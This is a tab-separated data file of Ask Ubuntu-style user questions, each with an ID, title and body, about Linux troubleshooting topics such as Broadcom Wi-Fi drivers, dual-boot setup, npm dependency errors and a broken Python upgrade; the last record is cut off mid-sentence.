470123	ca n't connect stable with bcm 4301 in ubuntu 12.04	i tried most of available info on internet and become desperate . outputs of ... lspci -nnk | grep -ia2 net lsmod iwconfig dmesg | grep b43 rfkill list ... are : 1 ) 02:01.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ [ 10ec:8139 ] ( rev 10 ) subsystem : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ [ 10ec:8139 ] kernel driver in use : 8139too 02:02.0 network controller [ 0280 ] : broadcom corporation bcm4301 802.11b wireless lan controller [ 14e4:4301 ] ( rev 02 ) subsystem : hewlett-packard company device [ 103c:12f3 ] kernel driver in use : b43-pci-bridge 2 ) module size used by ext2 68077 1 nls_iso8859_1 12617 1 usb_storage 48631 2 bnep 19210 2 rfcomm 59026 0 bluetooth 341971 10 bnep , rfcomm arc4 12509 2 snd_intel8x0 33458 2 b43legacy 118086 0 snd_ac97_codec 110295 1 snd_intel8x0 nouveau 870297 2 ac97_bus 12642 1 snd_ac97_codec snd_pcm 94597 2 snd_intel8x0 , snd_ac97_codec mac80211 534922 1 b43legacy snd_seq_midi 13132 0 snd_rawmidi 25157 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 55716 2 snd_seq_midi , snd_seq_midi_event ttm 76692 1 nouveau snd_timer 28930 2 snd_pcm , snd_seq snd_seq_device 14137 3 snd_seq_midi , snd_rawmidi , snd_seq drm_kms_helper 47306 1 nouveau drm 247722 4 nouveau , ttm , drm_kms_helper cfg80211 416271 2 b43legacy , mac80211 snd 61270 12 snd_intel8x0 , snd_ac97_codec , snd_pcm , snd_seq_midi , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 12600 1 snd pcmcia 55837 0 i2c_algo_bit 13316 1 nouveau joydev 17329 0 psmouse 92648 0 yenta_socket 44614 0 snd_page_alloc 18398 2 snd_intel8x0 , snd_pcm mxm_wmi 12893 1 nouveau pcmcia_rsrc 18495 1 yenta_socket ppdev 17423 0 pcmcia_core 22396 3 pcmcia , yenta_socket , pcmcia_rsrc serio_raw 13189 0 shpchp 32265 0 k8temp 12912 0 i2c_nforce2 13104 0 video 19046 1 nouveau parport_pc 32114 1 mac_hid 13077 0 wmi 18744 2 nouveau , mxm_wmi lp 13359 0 parport 40930 3 ppdev , parport_pc , lp hid_generic 12492 0 usbhid 47620 0 hid 87771 2 hid_generic , usbhid pata_acpi 12886 0 8139too 32770 0 8139cp 27260 0 ssb 56410 1 b43legacy mii 13693 2 8139too,8139cp pata_amd 13761 2 3 ) wlan0 ieee 802.11b essid : '' bbox2-joossens '' mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . eth0 no wireless extensions . 4 ) [ 1385.604082 ] b43legacy-phy0 error : mac suspend failed [ 3284.016083 ] b43legacy-phy0 : radio hardware status changed to disabled [ 3289.008120 ] b43legacy-phy0 : radio hardware status changed to enabled [ 3289.164093 ] b43legacy-phy0 : loading firmware version 0x127 , patch level 14 ( 2005-04-18 02:36:27 ) [ 3294.016094 ] b43legacy-phy0 : radio hardware status changed to disabled [ 3299.008119 ] b43legacy-phy0 : radio hardware status changed to enabled [ 3299.164085 ] b43legacy-phy0 : loading firmware version 0x127 , patch level 14 ( 2005-04-18 02:36:27 ) [ 3304.016096 ] b43legacy-phy0 : radio hardware status changed to disabled [ 3309.008121 ] b43legacy-phy0 : radio hardware status changed to enabled [ 3309.164131 ] b43legacy-phy0 : loading firmware version 0x127 , patch level 14 ( 2005-04-18 02:36:27 ) 5 ) wlan0 interface does n't support scanning : device or resource busy lo interface does n't support scanning . eth0 interface does n't support scanning . 6 ) 0 : phy0 : wireless lan soft blocked : no hard blocked : no
470131	how to get google apps launcher , google now , and notifications	i have chrome version 35.0.1916.114 on ubuntu 14.04 and have enabled the chrome flag 'enable the app launcher . linux ' . how do i get the new features - google apps launcher , google now and google notifications - to appear ?
470132	booting a node off san ( iscsi storage )	pls dont blame me if this is a dumb question.. i 'm new to linux stuff and 'maas ' seems simplifying building personal cloud node boots off tftp ( pxe ) for first time while setting up but later ubuntu os installs on to the node 's hard disk is n't a hard disk in every node waste of electricity and money ? is it possible to : 1 ) boot nodes off pxe server every time if all nodes are homogeneous ? 2 ) configure nodes to boot from iscsi san ( using custom boot rom or tools like etherboot ) if they are different architecture thanks
470134	how to find the creation time of a file ?	i need to find the creation time of a file , when i read some article about this issue , all mentioned that there is no solution like site1 , site2 . when i tried stat command it state birth : - so how can i find the creation time of a file ?
470136	vlc player can not support m4v files	i am an advanced user of ubuntu , and i made a script file for tunesviewer to make it work , and it can download all most all videos , and it uses vlc player but iy can not show the file *.m4v , and the file is a unidentified file called 'undf ' it says : no suitable decoder module : vlc does not support the audio or video format `` undf '' . unfortunately there is no way for you to fix this . and it shows a window with errors . when i click close it says : your input ca n't be opened : vlc is usable to open mrd 'http : //a45.v.phobos.apple.com/us/r1000/081/video/v4/85/54/f1/8554f106-6e77-8264-0bcb-e679609e8e3d/mzvf_5091800164576836550.640x480.h264lc.d2.p.m4c ' . check the log for details . and than it downloads the file but can not display it , and are there any other players that support this file type ? can some one please help .
470138	block size of 4096 byte min . file size is 1 mb	if i create a new text file of size 1 kb , it takes 1 mb on my disk , although block size is 4096 byte , how is this possible and how can i change this ? system : ubuntu server kernel : 3.5.0-39-generic raid 5 : 3 * 2tb $ sudo tune2fs -l /dev/md0 | grep block block count : 976689920 block size : 4096 blocks per group : 32768 $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid5 sdc1 [ 2 ] sdb1 [ 1 ] sda1 [ 0 ] 3906759680 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 3/3 ] [ uuu ] unused devices : < none > $ grep `` ^device /dev/md '' /proc/self/mountstats device /dev/md0 mounted on /mnt/raid with fstype ext4
470139	rearrange open programs in xubuntu task bar	my xubuntu ( ubuntu 13.10 ) task bar currently looks like this : i 'd like to be able to rearrange them in a different order . say for example , i want google chrome to be listed first . but i 'm not able to drag them and arrange it in the preferred order . it used to be possible in the ubuntu versions i 've used before . how can this be done ?
470140	dual boot with windows 8.1 and ubuntu 14.04	i want to do dual boot in my hp pavilion 15 series 259tx laptop , alongside with windows 8.1 . i have installed ubuntu 14.04 properly but after installing ubuntu 14.04 in separate partition i 'm not getting the grub menu whenever i restart my laptop . i have tried in many ways to find grub menu but i failed to find that .
470141	if indicator-appmenu is removed in 14.04 to restore normal menu bars , gnome app menus loose separators	if indicator-appmenu is removed in 14.04 to restore normal menu bars , gnome app menus loose separators . how can you get them back ?
470142	problems installing netgear wnda3100v2	disclaimer : i am a complete and total ubuntu newbie ( kinda like trying to learn swahili at age 49 ) ok..so i was up until midnight last night trying to install this device . thanks to many posts within the ubuntu community ( and elsewhere ) , i believe i made some headway . i downloaded and installed the ndiswrapper and followed instructions from several posts . i installed wine , and was able to run the cd from netgear . however , i have a netgear genie sitting on my desktop and it will not launch . when i plug in the device , my computer does not recognize a wifi adapter has been inserted . so i am surmising that i may have the correct software installed , but my ubuntu is not recognizing the hardware . aside from returning the device , any suggestions as to a fix for this ? thank you for your patience .
470145	how can i restore my unity after removing kde ?	eliah kagan 's answer to how to remove kde here ( how to remove all traces of kde installed ) is a great first step in removing kde from a ubunutu , but i still have remnants of kde that were not removed in plymouth and lightdm . how do you remove these ?
470147	ntfs formatted to ext4 by ubuntu installer data lost	i was installing ubuntu 14.04 dual boot with windows , i choose to install alongside but it did n't show me the screen to repartition and deleted my one partition and formatted it to ext4 and installed ubuntu in it now my data is lost , i want to recover it what should i do ? before installing i used fixpart in windows because previously it was n't showing my partitions
470149	how do you open an application that you made in a new text document	i just made an application with text editor 13.10 but i can not figure out how to run it please help i tried opening it in chrome but all it did was show the text
470152	error message ; [ ip ] in-addr.arpa has no ptr record:	i 'm trying to figure out how to find the hostnames of computers on the lan network . i put in the known address of a computer , but i 'm getting an error i do n't understand . michaelsavich @ noranetserver : ~ $ host 10.1.10.10 10.10.1.10.in-addr.arpa has no ptr record both computers are on the same lan , so the issue is n't with port forwarding or anything . for the record , the computer i ran host on was running ubuntu server 14.04 lts , and 10.1.10.10 should belong to a macbook .
470153	no wireless when install 14.04 on macbook pro	so i 'm attempting to dual-boot os x 10.8.5 ( native os ) and ubuntu 14.04 . i installed ubuntu ( hooray ! ) but upon booting into ubuntu i discovered i have no network connection from the os . i 'm very new to linux . i 've noticed some similar posts , however the only `` solution '' i 've seen so far is to screw the wireless connection and buy a usb-ethernet adapter . if i was using this computer at home that 'd be fine . but this is in an office and it 's wifi only . is there anyway to get the wireless adapter to work ? mac book pro , retina , 13-inch , late 2012 cpu 2.5 ghz intel core i5 memory 8gb # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux ______-macbookpro 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # arch # # # # # x86_64 # # # # # lspci # # # # # 02:00.0 ethernet controller [ 0200 ] : broadcom corporation device [ 14e4:16a3 ] ( rev 21 ) subsystem : broadcom corporation device [ 14e4:16a3 ] 02:00.1 sd host controller [ 0805 ] : broadcom corporation bcm57765/57785 sdxc/mmc card reader [ 14e4:16bc ] ( rev 21 ) 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4331 802.11a/b/g/n [ 14e4:4331 ] ( rev 02 ) subsystem : apple inc. airport extreme [ 106b:010f ] kernel driver in use : bcma-pci-bridge # # # # # lsusb # # # # # bus 002 device 005 : id 05ac:0259 apple , inc . bus 002 device 008 : id 05ac:828c apple , inc . bus 002 device 004 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 002 device 003 : id 0424:2512 standard microsystems corp. usb 2.0 hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 05ac:8510 apple , inc. facetime hd camera ( built-in ) bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 003 : id 1058:0748 western digital technologies , inc. my passport 1tb usb 3.0 bus 004 device 002 : id 2109:8110 bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 003 : id 045e:00db microsoft corp. natural ergonomic keyboard 4000 v1.0 bus 003 device 002 : id 2109:2811 bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : hci0 : bluetooth soft blocked : no hard blocked : no # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface # # # # # resolv.conf # # # # # # # # # # nm-tool # # # # # networkmanager tool state : disconnected # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # no way to aquire root rights found . # # # # # iwlist channel # # # # # # # # # # lsmod # # # # # b43 387371 0 mac80211 626489 1 b43 cfg80211 484040 2 b43 , mac80211 ssb 62379 1 b43 bcma 52096 1 b43 # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/b43/b43.ko firmware : b43/ucode9.fw firmware : b43/ucode5.fw firmware : b43/ucode16_mimo.fw firmware : b43/ucode15.fw firmware : b43/ucode14.fw firmware : b43/ucode13.fw firmware : b43/ucode11.fw license : gpl author : rafał miłecki author : gábor stefanik author : michael buesch author : stefano brivio author : martin langer description : broadcom b43 wireless driver srcversion : bed87d210887ffc71a4bde0 alias : bcma : m04bfid0812rev1dcl* alias : bcma : m04bfid0812rev18cl* alias : bcma : m04bfid0812rev17cl* alias : bcma : m04bfid0812rev11cl* alias : ssb : v4243id0812rev10* alias : ssb : v4243id0812rev0f* alias : ssb : v4243id0812rev0d* alias : ssb : v4243id0812rev0c* alias : ssb : v4243id0812rev0b* alias : ssb : v4243id0812rev0a* alias : ssb : v4243id0812rev09* alias : ssb : v4243id0812rev07* alias : ssb : v4243id0812rev06* alias : ssb : v4243id0812rev05* depends : bcma , ssb , mac80211 , cfg80211 intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : :47:4b : c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 parm : bad_frames_preempt : enable ( 1 ) / disable ( 0 ) bad frames preemption ( int ) parm : fwpostfix : postfix for the .fw files to load . ( string ) parm : hwpctl : enable hardware-side power control ( default off ) ( int ) parm : nohwcrypt : disable hardware encryption . ( int ) parm : hwtkip : enable hardware tkip . ( int ) parm : qos : enable qos support ( default on ) ( int ) parm : btcoex : enable bluetooth coexistence ( default on ) ( int ) parm : verbose : log message verbosity : 0=error , 1=warn , 2=info ( default ) , 3=debug ( int ) parm : pio : use pio accesses by default : 0=dma , 1=pio ( int ) parm : allhwsupport : enable support for all hardware ( even it if overlaps with the brcmsmac driver ) ( int ) filename : /lib/modules/3.13.0-24-generic/kernel/drivers/ssb/ssb.ko license : gpl description : sonics silicon backplane driver srcversion : 3de188310f77c566c2e8cb3 alias : pci : v000014e4d00004350sv*sd*bc*sc*i* alias : pci : v000014e4d0000432csv*sd*bc*sc*i* alias : pci : v000014e4d0000432bsv*sd*bc*sc*i* alias : pci : v000014e4d00004329sv*sd*bc*sc*i* alias : pci : v000014e4d00004328sv*sd*bc*sc*i* alias : pci : v000014e4d00004325sv*sd*bc*sc*i* alias : pci : v000014e4d00004324sv*sd*bc*sc*i* alias : pci : v000014e4d0000a8d6sv*sd*bc*sc*i* alias : pci : v000014e4d00004322sv*sd*bc*sc*i* alias : pci : v000014e4d00004321sv*sd*bc*sc*i* alias : pci : v000014e4d00004320sv*sd*bc*sc*i* alias : pci : v000014e4d00004319sv*sd*bc*sc*i* alias : pci : v000014a4d00004318sv*sd*bc*sc*i* alias : pci : v000014e4d00004318sv*sd*bc*sc*i* alias : pci : v000014e4d00004315sv*sd*bc*sc*i* alias : pci : v000014e4d00004312sv*sd*bc*sc*i* alias : pci : v000014e4d00004311sv*sd*bc*sc*i* alias : pci : v000014e4d00004307sv*sd*bc*sc*i* alias : pci : v000014e4d00004306sv*sd*bc*sc*i* alias : pci : v000014e4d00004301sv*sd*bc*sc*i* depends : intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : :47:4b : c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-24-generic/kernel/drivers/bcma/bcma.ko license : gpl description : broadcom 's specific amba driver srcversion : e41b811d88783dd5bc38565 alias : pci : v000014e4d00004727sv*sd*bc*sc*i* alias : pci : v000014e4d00004365sv*sd*bc*sc*i* alias : pci : v000014e4d00004359sv*sd*bc*sc*i* alias : pci : v000014e4d00004358sv*sd*bc*sc*i* alias : pci : v000014e4d00004357sv*sd*bc*sc*i* alias : pci : v000014e4d00004353sv*sd*bc*sc*i* alias : pci : v000014e4d00004331sv*sd*bc*sc*i* alias : pci : v000014e4d0000a8d8sv*sd*bc*sc*i* alias : pci : v000014e4d00004313sv*sd*bc*sc*i* alias : pci : v000014e4d00000576sv*sd*bc*sc*i* depends : intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : :47:4b : c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 # # # # # modules # # # # # lp rtc # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # # # # # dmesg # # # # # [ 5.075877 ] bcma : bus0 : found chip with id 0x4331 , rev 0x02 and package 0x09 [ 5.075904 ] bcma : bus0 : core 0 found : chipcommon ( manuf 0x4bf , id 0x800 , rev 0x25 , class 0x0 ) [ 5.075926 ] bcma : bus0 : core 1 found : ieee 802.11 ( manuf 0x4bf , id 0x812 , rev 0x1d , class 0x0 ) [ 5.075969 ] bcma : bus0 : core 2 found : pcie ( manuf 0x4bf , id 0x820 , rev 0x13 , class 0x0 ) [ 5.136742 ] bcma : bus0 : bus registered [ 5.489707 ] b43-phy0 : broadcom 4331 wlan found ( core revision 29 ) [ 5.490133 ] b43-phy0 : found phy : analog 9 , type 7 ( ht ) , revision 1 [ 5.490749 ] b43 bcma0:0 : direct firmware load failed with error -2 [ 5.490750 ] b43 bcma0:0 : falling back to user helper [ 5.496210 ] b43 bcma0:0 : direct firmware load failed with error -2 [ 5.496211 ] b43 bcma0:0 : falling back to user helper [ 5.496741 ] b43 bcma0:0 : direct firmware load failed with error -2 [ 5.496741 ] b43 bcma0:0 : falling back to user helper [ 5.497163 ] b43 bcma0:0 : direct firmware load failed with error -2 [ 5.497164 ] b43 bcma0:0 : falling back to user helper [ 5.497850 ] b43-phy0 error : firmware file `` b43/ucode29_mimo.fw '' not found [ 5.497851 ] b43-phy0 error : firmware file `` b43-open/ucode29_mimo.fw '' not found [ 5.497852 ] b43-phy0 error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for this driver version . please carefully read all instructions on this website . # # # # # # # # # # wireless info end # # # # # # # # # # # #
470154	i ca n't get my wired connection working properly ubuntu12.04	i 've recently installed ubuntu 12.04 on an old laptop . when i log in , the wired connection is active for about a minute , during which time i can browse the web etc . after this it displays the message 'wire disconnected ' and the wired connection no longer works . the cable is fine - it always works again for a minute on restart . i 'm new to linux but have had a good browse through past posts and ca n't see any symptoms that match exactly or solutions which i can implement . i 'm not sure exactly what details would help solve this but here are a few : initially ifconfig brings up a reference to eth 0 , but after the first minute ( when the connection is broken ) it does not the ethernet line of lspci is : 02:06.0 ethernet controller : broadcom corporation bcm4401 100base-t ( rev01 ) what other information would be useful ? thanks
470162	dual-boot fresh re-install ubuntu 14.04	ok guys , i have a dual booting laptop that has both windows 7 on it and ubuntu 14.04 . i was messing around on ubuntu and did some stuff with the nvidia drivers that im not quite sure how to fix . i dont have any backups ( lesson learned ) and being that i havent had it very long dont have anything on there that is irreplaceable ( a.k.a wiping it and then doing a clean install is perfectly fine with me ) . so i was wondering how i would do a fresh install of ubuntu 14.04 without screwing up grub or my windows 7 partition . all i want to do is wipe out the ubuntu side and re-install it back on there . do i just go through the same process as dual booting or is there something special i must do now that i have some different partitons ( the ubuntu one and the swap space ) before i can re-install it ? im still pretty new at this stuff so as detailed as possible is appreciated , thanks for all your help ! : )
470163	issue installing software	i just upgraded to ubuntu 14.04 and i have been trying to fix an error somewhere in the install process . no matter how i install ( software center , terminal ) it displays an error message close to this : installar chives ( ) failed : selecting previously unselected package libept1.4.12 : amd64 . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 242784 files and directories currently installed . ) preparing to unpack ... /libept1.4.12_1.0.12_amd64.deb ... unpacking libept1.4.12 : amd64 ( 1.0.12 ) ... selecting previously unselected package sgml-data . preparing to unpack ... /sgml-data_2.0.9-1_all.deb ... unpacking sgml-data ( 2.0.9-1 ) ... selecting previously unselected package docbook-xml . preparing to unpack ... /docbook-xml_4.5-7.2_all.deb ... unpacking docbook-xml ( 4.5-7.2 ) ... selecting previously unselected package librarian0 . preparing to unpack ... /librarian0_0.8.1-5ubuntu1_amd64.deb ... unpacking librarian0 ( 0.8.1-5ubuntu1 ) ... selecting previously unselected package rarian-compat . preparing to unpack ... /rarian-compat_0.8.1-5ubuntu1_amd64.deb ... unpacking rarian-compat ( 0.8.1-5ubuntu1 ) ... selecting previously unselected package synaptic . preparing to unpack ... /synaptic_0.81.1ubuntu1_amd64.deb ... unpacking synaptic ( 0.81.1ubuntu1 ) ... processing triggers for sgml-base ( 1.26+nmu4ubuntu1 ) ... processing triggers for doc-base ( 0.10.5 ) ... scrollkeeper was installed , forcing re-registration of all documents . unregistering 33 doc-base files , re-registering 33 doc-base files ... registering documents with scrollkeeper ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for mime-support ( 3.54ubuntu1 ) ... processing triggers for hicolor-icon-theme ( 0.13-1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... setting up xserver-common-lts-raring ( 3:5 ) ... removing 'diversion of /usr/lib/xorg/protocol.txt to /usr/lib/xorg/protocol-precise.txt by xserver-common-lts-raring' dpkg-divert : error : rename involves overwriting `/usr/lib/xorg/protocol.txt ' with different file `/usr/lib/xorg/protocol-precise.txt ' , not allowed dpkg : error processing package xserver-common-lts-raring ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up libept1.4.12 : amd64 ( 1.0.12 ) ... setting up sgml-data ( 2.0.9-1 ) ... setting up librarian0 ( 0.8.1-5ubuntu1 ) ... setting up synaptic ( 0.81.1ubuntu1 ) ... processing triggers for sgml-base ( 1.26+nmu4ubuntu1 ) ... setting up docbook-xml ( 4.5-7.2 ) ... processing triggers for sgml-base ( 1.26+nmu4ubuntu1 ) ... setting up rarian-compat ( 0.8.1-5ubuntu1 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... error in function : setting up xserver-common-lts-raring ( 3:5 ) ... removing 'diversion of /usr/lib/xorg/protocol.txt to /usr/lib/xorg/protocol-precise.txt by xserver-common-lts-raring' dpkg-divert : error : rename involves overwriting `/usr/lib/xorg/protocol.txt ' with different file `/usr/lib/xorg/protocol-precise.txt ' , not allowed dpkg : error processing package xserver-common-lts-raring ( -- configure ) : subprocess installed post-installation script returned error exit status 2 in software center it displays that `` package operation failed '' it does install the programs i want , but i would really like to get rid of the error message . thanks !
470164	split screen with nvidia card , monitor not detected	i have a lenovo y410p laptop , with a geforce 750m video card , and i 'm using ubuntu 12.04 . i 'm trying to use an external monitor , but i 'm having some problems . whenever i plug my monitor , it always copies the laptop screen . but i want to have two workspaces . if i open `` displays '' , it does not detect the external monitor . this is the output when i run lspci : $ lspci -nn |grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 4th gen core processor integrated graphics controller [ 8086:0416 ] ( rev 06 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gk107m [ geforce gt 750m ] [ 10de:0fe4 ] ( rev a1 ) i have already installed the nvidia drivers and reinstalled and installed again . i 've seen some people solving this problem by accessing the x server settings , and setting up twinview , but i do n't see this option , which is also strange . here is my x server window : https : //www.dropbox.com/s/3hvahg61r0u3x9g/askubuntu.jpg ( sorry i 'm new here at the forum so i do n't have enough reputation to show images ) then i found disper . i also tried to use it but it also does n't detect my monitor . i do n't have ideas anymore on how to solve this problem . what do you guys suggest ? thank you and have a nice day , lucas
470168	module : graceful-fs : npm err ! install could n't read dependencies	1 ) just built a freshly installed ubunto 14.04 vm . 2 ) followed instructions at http : //askubuntu.com/a/83290 3 ) followed instructions at https : //www.npmjs.org/package/generator-sili 4 ) getting error - it fails to run `` npm install '' because of : '' npm err ! install could n't read dependencies npm err ! error : invalid name : `` function ( ) { [ native code ] } '' npm err ! at ensurevalidname ( /usr/lib/node_modules/npm/node_modules/read-package-json/node_modules/normalize-package-data/lib/fixer.js:300:15 ) npm err ! at object.module.exports.fixnamefield ( /usr/lib/node_modules/npm/node_modules/read-package-json/node_modules/normalize-package-data/lib/fixer.js:204:5 ) npm err ! at /usr/lib/node_modules/npm/node_modules/read-package-json/node_modules/normalize-package-data/lib/normalize.js:30:38 npm err ! at array.foreach ( native ) npm err ! at normalize ( /usr/lib/node_modules/npm/node_modules/read-package-json/node_modules/normalize-package-data/lib/normalize.js:29:15 ) npm err ! at final ( /usr/lib/node_modules/npm/node_modules/read-package-json/read-json.js:342:33 ) npm err ! at then ( /usr/lib/node_modules/npm/node_modules/read-package-json/read-json.js:126:33 ) npm err ! at /usr/lib/node_modules/npm/node_modules/read-package-json/read-json.js:266:40 npm err ! at fs.js:266:14 npm err ! at /usr/lib/node_modules/npm/node_modules/graceful-fs/graceful-fs.js:105:5 '' seems that the graceful-fs module is failing it all ... . anyone can help here ?
470169	ca n't add canadian multilingual keyboard layout in lubuntu	i go to ibus preferences in lubuntu and can add french ( canada ) , but it 's not the canadian multilingual layout . i tried installing m17 ibus packages and it adds a bunch of languages but not more french options ( other than the french azerty m17 option ) . i did n't have this problem in ubuntu , just lubuntu . please help ! thanks in advance .
470172	ubuntu gui error	i am new to ubuntu and linux and just starting my journey . i have successfully installed and have the os booting from a console window . i have tried to download the gui through sudo apt-get update then sudo apt-get install ubuntu-desktop , but ran into this error : unable to locate package ubuntu-desktop kindly assist with the steps to follow in order to install the gui .
470173	videos stopped playing on every website	i have an hp chrome-book 14 . i 've installed the ubuntu 12.4 os on it so i could begin learning to code . because i prefer the chrome browser , i 've also installed google chrome stable ( version 35.0.1916.114 ) . everything has worked smoothly for the last couple months , but last night video stopped working on all websites . when i switch to firefox , videos `` sometimes '' play , but are stopping frequently . i 've researched similar issues on this forum and others , but none of the solutions provided ( clearing browser data/caches , opening windows in incognito mode , making sure i have an updated shockwave flashplayer version and that no other flashplayers or media players are interfering , making sure the chrome browser is updated , have worked . i 've even uninstalled and re-installed the chrome browser , and have also reset the browser , but it still wo n't play videos . when i go to youtube , or any other site with imbedded video for that matter , it will play the video for what seems a millisecond , but not play past that part . there is no white/gray/black screen or anything else . it simply stops after i first start the video . what is interesting is that when i switch from ubuntu back to the default chromebook , videos play fine . so i 'm thinking this may be an ubuntu issue . unfortunately , i 'm unfamiliar with diagnosing driver issues , if that is the problem . i should also add that internet speed is fine . no issues there .
470178	how hold smb in personal folder ?	when i turn on my ubuntu 14 i have always search my smb . but i use every day , how can i hold smb in personal folder ? see the pics below
470181	how to downgrade gcc from 4.5.2 to 2 ?	i 'm using ubuntu that have gcc version 4.5.2 on it . i really need to downgrade it to any 2 versions but i do n't know how and where can i find that version .
470185	motion computing le1600 touchscreen functions unavailable in 14.04	i recently obtained a motion computing le1600 that i replaced windows xp with ubuntu 14.04 on today , and i can not seem to get the touchscreen functions to work properly . is there anything that can be done to rectify this issue ?
470187	how to translate listelement property with ubuntu sdk	i have my fist ubuntu touch qml app running , and i am willing to translate it . whenever i use a ui string in the qml files , i was careful to use i18n.tr ( `` my text '' ) . so now i need to generate the pot , po , and mo files . i found this question and a relevant answer , even if i 'm not sure this is up to date ( for example , the screenshot taken by zeokila does not correspond to what i see in my qtcreator version ... ? ) . maybe a comprehensive howto exists ? so my question is specifically this : how can strings in listelement properties be taken into account by xgettext when generating the pot file ? i can not use i18n.tr here , as this results in a `` listelement : can not use script for property value '' error . with plain qt qstr ( ) and lupdate , you can use qt_tr_noop ( ) to make these strings visible to lupdate . how to do it with xgettext ?
470188	python not working after trying to upgrade to a newer version of python	ok , this is totally my fault . i should not have tried to install and compile python 2.75 . after everything went haywire , i saw someone on this site caution against doing this very thing . i am running django and it was working fine until the upgrade attempt . i then managed to switch the default version from 2.73 to 2.75 and by doing a make install within the python dir . when i checked the version running the os said 2.75 , so i figured great it worked . not so . django then stopped working . i attempted to switch back to 2.73 and that seemed to have worked . however , now i get python errors showing that django , pil etc are not installed . so , i thought to try and re-install them and i get these messages `` requirement already satisfied '' and that the packages are in the dist-packages dir in the python 2 . 7 directory . what happened ? how do i fix this ? i have tried creating a running a simple test script containing this code : from distutils.sysconfig import get_python_lib print ( get_python_lib ( ) ) and it worked . so , i know python 2.73 is functional , but my libraries including django do not work still . i tried adding import site ; site.getsitepackages ( ) to one of my python scripts that uses pil and i still get this error : file `` display.py '' , line 6 , in < module > from imgprocess import imgprocess file `` 